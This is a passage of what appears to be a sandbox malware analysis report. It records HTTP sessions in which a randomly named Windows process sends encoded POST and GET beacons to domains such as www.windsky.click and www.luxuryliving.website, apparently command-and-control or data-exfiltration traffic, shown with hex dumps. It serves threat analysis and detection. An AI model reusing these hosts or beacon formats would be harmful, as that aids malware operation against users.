Jan 11, 2025 09:22:39.546056986 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Sat, 11 Jan 2025 08:22:39 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49760	46.253.5.221	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:22:44.612538099 CET	724	OUT	POST /pygh/ HTTP/1.1 Host: www.windsky.click Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.windsky.click Referer: http://www.windsky.click/pygh/ Connection: close Content-Length: 207 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 76 6e 6d 66 37 66 47 44 77 43 64 70 67 43 43 33 49 62 55 69 32 66 46 64 58 5a 79 68 66 5a 61 4c 39 42 66 31 79 57 33 75 75 70 6c 57 42 2b 6a 76 71 50 6b 67 33 48 65 33 78 6c 61 44 38 6f 63 70 67 53 34 74 42 46 6c 34 62 63 77 6d 36 72 36 6d 62 52 70 41 69 72 4c 4a 30 4f 46 76 57 2f 71 52 54 6e 74 4c 2f 2b 36 65 42 50 49 75 42 64 6d 64 31 38 35 54 55 42 39 6d 4c 4b 56 43 5a 45 38 68 37 39 4c 57 79 43 78 6c 35 52 6f 4f 73 2f 2f 42 75 50 52 48 61 33 64 6e 72 48 35 2f 38 4e 73 71 53 49 6b 56 34 62 39 68 32 6e 67 74 6c 6e 61 2f 54 50 6d 2b 2b 4b 7a 74 6c 4e 51 33 62 54 37 66 57 79 43 33 4d 2f 49 3d Data Ascii: 3DkHhn=vnmf7fGDwCdpgCC3IbUi2fFdXZyhfZaL9Bf1yW3uuplWB+jvqPkg3He3xlaD8ocpgS4tBFl4bcwm6r6mbRpAirLJ0OFvW/qRTntL/+6eBPIuBdmd185TUB9mLKVCZE8h79LWyCxl5RoOs//BuPRHa3dnrH5/8NsqSIkV4b9h2ngtlna/TPm++KztlNQ3bT7fWyC3M/I=
Jan 11, 2025 09:22:45.440356016 CET	774	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 11 Jan 2025 08:22:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Language: en X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Referrer-Policy: origin-when-cross-origin X-XSS-Protection: 1; mode=block Expect-CT: enforce; max-age=3600 Referrer-Policy: no-referrer-when-downgrade Strict-Transport-Security: max-age=63072000 Content-Encoding: gzip Data Raw: 31 30 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 51 31 52 c3 30 10 ec 79 c5 a1 1a 3b b8 a3 88 d2 10 e8 18 52 84 82 f2 22 2f f6 4d 64 99 f1 1d f1 e4 f7 28 09 99 24 1e d4 ed 4a bb da bd 23 3a 9d f9 fd f2 fd 79 fd b9 7a a1 d6 ba b8 b8 a3 33 7f 80 14 39 35 de 21 b9 eb 0b 70 7d 81 47 aa 83 31 85 96 07 85 79 f7 b1 7e 2d 9e dc 7f 4f 12 77 f0 6e 27 18 bf fb c1 1c 85 3e 19 52 96 8c 52 5b eb 6b ec 24 a0 38 82 07 92 24 26 1c 0b 0d 1c e1 ab f2 71 6a 19 25 6d 69 40 f4 4e 6d 1f a1 2d 90 3d db 01 5f 67 a6 0c aa 53 95 89 45 2c de 58 8c 53 00 75 50 e5 06 f3 d9 89 bf d4 9c dd f6 9c 6f fa 7a 3f b1 aa 65 47 21 b2 aa 77 1d cb a1 ca c1 b2 f8 b3 9c 7c 7c 9a 5d b5 58 b7 a0 11 1b 15 03 89 d2 4f aa 31 34 bd a4 86 ae 3c 4a 5a 45 b0 22 4f a8 03 6d 38 6c f3 2a 0c 43 99 63 55 93 14 b3 1c e3 3a f7 6d d0 2c b8 d9 eb 2f b4 74 8c 33 f8 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 10dmQ1R0y;R"/Md($J#:yz395!p}G1y~-Own'>RR[k$8$&qj%mi@Nm-=_gSE,XSuPoz?eG!w\|\|]XO14<JZE"Om8l*CcU:m,/t30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49776	46.253.5.221	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:22:47.165770054 CET	744	OUT	POST /pygh/ HTTP/1.1 Host: www.windsky.click Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.windsky.click Referer: http://www.windsky.click/pygh/ Connection: close Content-Length: 227 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 76 6e 6d 66 37 66 47 44 77 43 64 70 68 6a 53 33 59 49 73 69 30 2f 46 65 4f 35 79 68 49 4a 62 43 39 47 58 31 79 58 44 45 75 36 42 57 47 63 4c 76 70 4f 6b 67 77 48 65 33 2b 46 62 6f 68 59 63 75 67 53 38 66 42 41 64 34 62 63 30 6d 36 70 79 6d 62 69 42 42 6a 37 4c 4c 74 2b 46 74 59 66 71 52 54 6e 74 4c 2f 39 47 34 42 50 77 75 42 76 79 64 30 64 35 51 63 68 39 6c 64 61 56 43 54 6b 38 36 37 39 4c 4f 79 44 74 4c 35 54 67 4f 73 36 62 42 75 62 39 59 44 48 64 68 6b 6e 35 72 39 65 38 6d 57 59 6f 43 6d 72 6b 43 6f 46 73 74 74 78 72 56 4a 74 75 34 39 4b 62 47 6c 4f 34 42 65 6b 6d 33 4d 52 53 48 53 6f 65 72 7a 2b 54 62 49 44 70 57 79 44 77 78 78 75 59 65 4c 5a 71 47 Data Ascii: 3DkHhn=vnmf7fGDwCdphjS3YIsi0/FeO5yhIJbC9GX1yXDEu6BWGcLvpOkgwHe3+FbohYcugS8fBAd4bc0m6pymbiBBj7LLt+FtYfqRTntL/9G4BPwuBvyd0d5Qch9ldaVCTk8679LOyDtL5TgOs6bBub9YDHdhkn5r9e8mWYoCmrkCoFsttxrVJtu49KbGlO4Bekm3MRSHSoerz+TbIDpWyDwxxuYeLZqG
Jan 11, 2025 09:22:47.955934048 CET	774	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 11 Jan 2025 08:22:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Language: en X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Referrer-Policy: origin-when-cross-origin X-XSS-Protection: 1; mode=block Expect-CT: enforce; max-age=3600 Referrer-Policy: no-referrer-when-downgrade Strict-Transport-Security: max-age=63072000 Content-Encoding: gzip Data Raw: 31 30 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 51 31 52 c3 30 10 ec 79 c5 a1 1a 3b b8 a3 88 d2 10 e8 18 52 84 82 f2 22 2f f6 4d 64 99 f1 1d f1 e4 f7 28 09 99 24 1e d4 ed 4a bb da bd 23 3a 9d f9 fd f2 fd 79 fd b9 7a a1 d6 ba b8 b8 a3 33 7f 80 14 39 35 de 21 b9 eb 0b 70 7d 81 47 aa 83 31 85 96 07 85 79 f7 b1 7e 2d 9e dc 7f 4f 12 77 f0 6e 27 18 bf fb c1 1c 85 3e 19 52 96 8c 52 5b eb 6b ec 24 a0 38 82 07 92 24 26 1c 0b 0d 1c e1 ab f2 71 6a 19 25 6d 69 40 f4 4e 6d 1f a1 2d 90 3d db 01 5f 67 a6 0c aa 53 95 89 45 2c de 58 8c 53 00 75 50 e5 06 f3 d9 89 bf d4 9c dd f6 9c 6f fa 7a 3f b1 aa 65 47 21 b2 aa 77 1d cb a1 ca c1 b2 f8 b3 9c 7c 7c 9a 5d b5 58 b7 a0 11 1b 15 03 89 d2 4f aa 31 34 bd a4 86 ae 3c 4a 5a 45 b0 22 4f a8 03 6d 38 6c f3 2a 0c 43 99 63 55 93 14 b3 1c e3 3a f7 6d d0 2c b8 d9 eb 2f b4 74 8c 33 f8 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 10dmQ1R0y;R"/Md($J#:yz395!p}G1y~-Own'>RR[k$8$&qj%mi@Nm-=_gSE,XSuPoz?eG!w\|\|]XO14<JZE"Om8l*CcU:m,/t30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49794	46.253.5.221	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:22:49.713234901 CET	1761	OUT	POST /pygh/ HTTP/1.1 Host: www.windsky.click Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.windsky.click Referer: http://www.windsky.click/pygh/ Connection: close Content-Length: 1243 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 76 6e 6d 66 37 66 47 44 77 43 64 70 68 6a 53 33 59 49 73 69 30 2f 46 65 4f 35 79 68 49 4a 62 43 39 47 58 31 79 58 44 45 75 36 4a 57 47 74 72 76 71 74 63 67 78 48 65 33 7a 6c 62 72 68 59 64 79 67 53 46 55 42 41 42 6f 62 65 63 6d 34 4d 6d 6d 4b 6a 42 42 70 37 4c 4c 6c 65 46 73 57 2f 71 41 54 6e 39 50 2f 2b 2b 34 42 50 77 75 42 75 43 64 39 73 35 51 61 68 39 6d 4c 4b 56 57 5a 45 39 30 37 37 6a 77 79 44 70 31 2b 69 41 4f 73 63 37 42 72 75 52 59 63 33 64 6a 68 6e 34 73 39 65 78 34 57 59 31 37 6d 6f 35 74 6f 48 38 74 75 6e 32 6a 61 35 72 6b 69 35 2f 56 74 63 55 38 5a 45 47 32 42 53 4f 6f 56 4c 48 49 78 4a 44 53 44 79 56 61 6d 78 64 4f 6a 71 67 6c 43 76 2f 36 70 70 4e 7a 53 50 33 38 2b 43 73 47 6b 36 45 72 30 2f 66 4d 78 32 2b 39 6e 36 68 65 6d 59 58 46 76 48 4b 4f 41 46 50 59 6b 77 4d 4a 71 75 74 71 79 35 56 2b 6d 54 45 6c 5a 6e 72 79 6f 48 64 51 46 64 35 41 35 57 68 73 77 48 56 4a 54 6e 76 4a 2f 77 56 46 42 5a 52 36 42 49 52 4a 32 59 7a 42 6d 6d 38 65 31 58 72 6c 59 4d 39 62 53 5a 72 [TRUNCATED] Data Ascii: 3DkHhn=vnmf7fGDwCdphjS3YIsi0/FeO5yhIJbC9GX1yXDEu6JWGtrvqtcgxHe3zlbrhYdygSFUBABobecm4MmmKjBBp7LLleFsW/qATn9P/++4BPwuBuCd9s5Qah9mLKVWZE9077jwyDp1+iAOsc7BruRYc3djhn4s9ex4WY17mo5toH8tun2ja5rki5/VtcU8ZEG2BSOoVLHIxJDSDyVamxdOjqglCv/6ppNzSP38+CsGk6Er0/fMx2+9n6hemYXFvHKOAFPYkwMJqutqy5V+mTElZnryoHdQFd5A5WhswHVJTnvJ/wVFBZR6BIRJ2YzBmm8e1XrlYM9bSZr7bWCxcdKzwCSJ6aJARbHPXI5xpsNb3evGI9VS/rvA9INGNMOY0rJtiU99K5RSFGb5wvYF3bhKrStt8thQV8OObFIFY5dNe9X8SRcB4qXdURVZJpAFaPu2J/ZAq3uzo+n6oifxiA5QZZOOAQFvzBJYWkPn3kh2AaN2AlfS/0Ev2J8SIej/hlrqxUggZEqdrFMkLcEOO+VstowL0ZWvBxLPe1tx25iXH3rYaP5+TUn4n5TJ1RLF8TyV4JrsBMpSpaXK/FUIs+/7WNzQ/R6QVdCyraJ9DmT/0jQXyuxLSDKb25QQGkZ7nGVMfMXMWzSn5pUQZg8mJYWBPHVWK0tRyP5ufI9sqEBQPCV8d67kId3g55SHLj/Rixl5JJCYNCc5f8pkPKSaoON5D3vbt3N199ENCBmtdTHBxrBMJdDw9aly76t+zTuBa54f9KaoZAuqzzGi0upP4g4qA/Jmr4OrJRX7zgZX2s+V6vtQT8sm6bwSxBU3EPSxYS6euug6Sq/ipqwlaaLR1B5IEs3u7QowAF31oZpoXjl1F3s56YImSsUJOQO/dETj9cwzVr9YL62PwImGKeYuZtaFnK/ESEnHv6Lf7X1qOrAF+JFgLQOJuvQSgl38U1tZAg3/bKeQ7PkcYa5fljDM1H1MUccSVcOSBgibznWcI/TnGVU/2 [TRUNCATED]
Jan 11, 2025 09:22:50.525701046 CET	774	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 11 Jan 2025 08:22:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Language: en X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Referrer-Policy: origin-when-cross-origin X-XSS-Protection: 1; mode=block Expect-CT: enforce; max-age=3600 Referrer-Policy: no-referrer-when-downgrade Strict-Transport-Security: max-age=63072000 Content-Encoding: gzip Data Raw: 31 30 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 51 31 52 c3 30 10 ec 79 c5 a1 1a 3b b8 a3 88 d2 10 e8 18 52 84 82 f2 22 2f f6 4d 64 99 f1 1d f1 e4 f7 28 09 99 24 1e d4 ed 4a bb da bd 23 3a 9d f9 fd f2 fd 79 fd b9 7a a1 d6 ba b8 b8 a3 33 7f 80 14 39 35 de 21 b9 eb 0b 70 7d 81 47 aa 83 31 85 96 07 85 79 f7 b1 7e 2d 9e dc 7f 4f 12 77 f0 6e 27 18 bf fb c1 1c 85 3e 19 52 96 8c 52 5b eb 6b ec 24 a0 38 82 07 92 24 26 1c 0b 0d 1c e1 ab f2 71 6a 19 25 6d 69 40 f4 4e 6d 1f a1 2d 90 3d db 01 5f 67 a6 0c aa 53 95 89 45 2c de 58 8c 53 00 75 50 e5 06 f3 d9 89 bf d4 9c dd f6 9c 6f fa 7a 3f b1 aa 65 47 21 b2 aa 77 1d cb a1 ca c1 b2 f8 b3 9c 7c 7c 9a 5d b5 58 b7 a0 11 1b 15 03 89 d2 4f aa 31 34 bd a4 86 ae 3c 4a 5a 45 b0 22 4f a8 03 6d 38 6c f3 2a 0c 43 99 63 55 93 14 b3 1c e3 3a f7 6d d0 2c b8 d9 eb 2f b4 74 8c 33 f8 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 10dmQ1R0y;R"/Md($J#:yz395!p}G1y~-Own'>RR[k$8$&qj%mi@Nm-=_gSE,XSuPoz?eG!w\|\|]XO14<JZE"Om8l*CcU:m,/t30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49813	46.253.5.221	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:22:52.253429890 CET	465	OUT	GET /pygh/?3DkHhn=ilO/4vqZmQYrpwPPFa4t8e1nNqm6CsSV7Cv28Gr+0e5NDs7N6pcA+3a3+3Ovna0xpHwPFTpZZrsm+pOkWjhKiv20scVBFeiNJHZi5P3lJ6QcAPGU/PVqaGZOMv9wS1Aqmw==&jH4x=86JHl HTTP/1.1 Host: www.windsky.click Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Jan 11, 2025 09:22:53.058301926 CET	985	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 11 Jan 2025 08:22:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Language: en X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Referrer-Policy: origin-when-cross-origin X-XSS-Protection: 1; mode=block Expect-CT: enforce; max-age=3600 Referrer-Policy: no-referrer-when-downgrade Strict-Transport-Security: max-age=63072000 Data Raw: 31 66 38 0d 0a 20 20 20 20 20 20 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 69 74 61 6e 63 65 20 6d 65 73 73 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 [TRUNCATED] Data Ascii: 1f8 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="styles.css"> <title>Maitance message</title> </head> <body> <div class="maintenance-message"> <h1>The website is undergoing maintenance. Please come back later.</h1> </div> </body> </html> 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49904	209.74.77.109	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:23:06.224632978 CET	745	OUT	POST /m85b/ HTTP/1.1 Host: www.luxuryliving.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.luxuryliving.website Referer: http://www.luxuryliving.website/m85b/ Connection: close Content-Length: 207 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 63 52 69 46 76 2f 7a 61 66 6a 4c 30 79 31 62 52 68 36 32 54 36 47 32 6d 4c 52 6a 37 4e 57 43 36 59 6b 62 2f 5a 72 49 4f 57 63 4e 6d 55 6a 49 39 74 2f 72 69 62 65 56 52 77 55 4f 6f 68 4b 53 51 44 6d 2f 31 75 6d 70 53 35 50 6e 46 5a 69 39 42 61 4a 50 6d 30 58 43 75 50 36 63 42 55 62 58 55 34 2b 33 66 72 36 4f 48 36 41 38 54 5a 55 4a 59 53 67 41 43 39 75 39 75 52 58 4d 70 49 4d 69 7a 59 51 43 57 35 75 34 6e 67 62 64 38 55 37 39 58 79 4e 62 4e 42 75 78 68 56 35 61 75 6c 59 33 5a 6d 42 31 74 69 72 37 49 32 78 4c 74 48 64 77 45 66 38 64 32 52 78 6a 4d 76 4a 76 72 50 52 44 53 2b 7a 75 69 32 2f 38 3d Data Ascii: 3DkHhn=cRiFv/zafjL0y1bRh62T6G2mLRj7NWC6Ykb/ZrIOWcNmUjI9t/ribeVRwUOohKSQDm/1umpS5PnFZi9BaJPm0XCuP6cBUbXU4+3fr6OH6A8TZUJYSgAC9u9uRXMpIMizYQCW5u4ngbd8U79XyNbNBuxhV5aulY3ZmB1tir7I2xLtHdwEf8d2RxjMvJvrPRDS+zui2/8=
Jan 11, 2025 09:23:06.764780045 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:23:06 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49920	209.74.77.109	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:23:08.777729034 CET	765	OUT	POST /m85b/ HTTP/1.1 Host: www.luxuryliving.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.luxuryliving.website Referer: http://www.luxuryliving.website/m85b/ Connection: close Content-Length: 227 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 63 52 69 46 76 2f 7a 61 66 6a 4c 30 7a 55 72 52 74 35 75 54 74 32 32 6c 58 42 6a 37 66 57 43 2b 59 6b 6e 2f 5a 71 64 54 57 75 70 6d 55 44 34 39 6a 65 72 69 63 65 56 52 34 30 4f 74 6c 4b 53 62 44 6d 7a 48 75 6a 4a 53 35 4f 44 46 5a 6e 42 42 61 36 6e 6c 6d 58 43 73 41 61 63 44 61 37 58 55 34 2b 33 66 72 38 69 39 36 41 30 54 59 6b 35 59 53 43 6f 42 6a 2b 39 74 53 58 4d 70 43 63 69 33 59 51 43 30 35 71 77 42 67 5a 6c 38 55 2b 5a 58 72 34 6e 4f 4f 75 78 72 49 70 62 5a 70 64 75 47 73 53 6c 59 75 72 7a 32 79 79 44 33 4c 4c 42 75 46 65 56 77 53 78 4c 6e 76 4b 48 64 4b 6d 65 36 6b 51 2b 53 6f 6f 72 6e 39 2f 47 32 77 76 5a 4b 53 4c 33 4b 47 42 54 42 2b 73 59 77 Data Ascii: 3DkHhn=cRiFv/zafjL0zUrRt5uTt22lXBj7fWC+Ykn/ZqdTWupmUD49jericeVR40OtlKSbDmzHujJS5ODFZnBBa6nlmXCsAacDa7XU4+3fr8i96A0TYk5YSCoBj+9tSXMpCci3YQC05qwBgZl8U+ZXr4nOOuxrIpbZpduGsSlYurz2yyD3LLBuFeVwSxLnvKHdKme6kQ+Soorn9/G2wvZKSL3KGBTB+sYw
Jan 11, 2025 09:23:09.362889051 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:23:09 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 